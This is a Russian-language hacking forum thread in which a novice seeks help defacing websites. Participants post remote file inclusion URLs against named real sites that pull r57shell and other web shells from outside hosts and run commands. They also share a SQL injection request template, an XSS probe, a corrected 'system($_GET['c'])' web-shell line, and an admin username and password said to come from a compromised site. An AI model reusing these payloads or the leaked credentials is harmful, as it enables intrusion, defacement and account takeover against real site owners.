Вопрос по shell

Никак не получаеться шелл залить,вернее получаеться но както криво,вроде заливка идёт,но ничего не происходит
вот ссылка http://df.md/index.php?act=http://arry1.narod.ru/shell
или http://df.md/index.php?act=http://fordestroy.narod.ru/r57shel,
а если можно и тутор дайте,хочу Дефес зделать вот ..всё вродеб...
спс заранее.

 

Ps юзал поиск не нарыл ничего,щас в видео бибиотеке гляну.

 

Не грузится у меня чет ни df.md, ни твои сайты на народе...

 

странно.... http://www.df.md

 

Если с шеллом не получится попробуй SQL-запрос выполнить в галерее

PHP:

GET /cpg/displayimage.php?album=random&cat=0&pos=-{Not Viewd Image ID} HTTP/1.1
Host: адрес сайта
User-Agent: ’sql commands
Keep-Alive: 300
Cookie: твоя сессия


 

мммм.....http://arry1.narod.ru/shell.php разве не грузиться?

 

неа не вышло...но спс за поддержку +1 тебе)

 

слуш как проверить валидность шела?этого http://arry1.narod.ru/shell
просо думал пчп иньекцию,а потом радмином...

 

вот ещё нарыл, http://www.grailcoat.com/index.php?p=12 следвательно => http://www.grailcoat.com/index.php?p=http://arry1.narod.ru/1.txt&c=ls%20-l
где 1.тхт :

а пишет "parse error" в чём ошибка?

 

потом ввел http://www.grailcoat.com/index.php?p=http://arry1.narod.ru/shell.php&c=ls%20-l
и ваще какаята бредуха Оо
поможет ктото?

 

Да нифига не следовательно!
смотри: http://www.grailcoat.com/index.php?p=%3Cscript%3Ealert()%3C/script%3E
выскакивает алерт, это пасивная xss а ты туда просто ссылку вставляеш! так ничего не получиться!

 

УРААААААААААААААААААААААААААА! взломан )))))
ошибку нашел)))))

 

нет там по другому надо было зделать )))

 

вот скриники http://slil.ru/23085371 )

 

чёт http://www.g4.com.tw/index.php?p=http://rst.void.ru/download/r57shell.txt сюда не заливаеться ремвьюв с http://arry1.narod.ru/remview.php Оо
ребята реально помогите ктото,я первый раз пытаюсь чтото взломать (цель дефейс)
и нужна помошь,вспомните себя в начале... плз)
***чтобы не зделал пишет "Доступ запрещён!"

 

system($_GET['c']};
нетакая скобка system($_GET['c']);

 

всё нормально инклудить, вот пример с удаленным файлом :
_http://www.grailcoat.com/index.php?p=http://rst.void.ru/download/r57shell.txt =)

 

по поводу http://www.grailcoat.com/,там редактировать недьзя...,написал в строке выполнить /admin.php там взял пасс (кстати вот он пас от админики сайта юзер grail
пасс grailPASS123 но админка невалидная ))))
ЗЫ: спасибо большое gemaglab1n,единственный чел который помог и обьяснил что к чему)

 

чё вы бедный http://www.grailcoat.com/ мучаете
вот поиграйтесь с комуняками
http://www.belkprf.ru/news.php?article=http://hrs-xss.narod.ru/shell.php

 

))))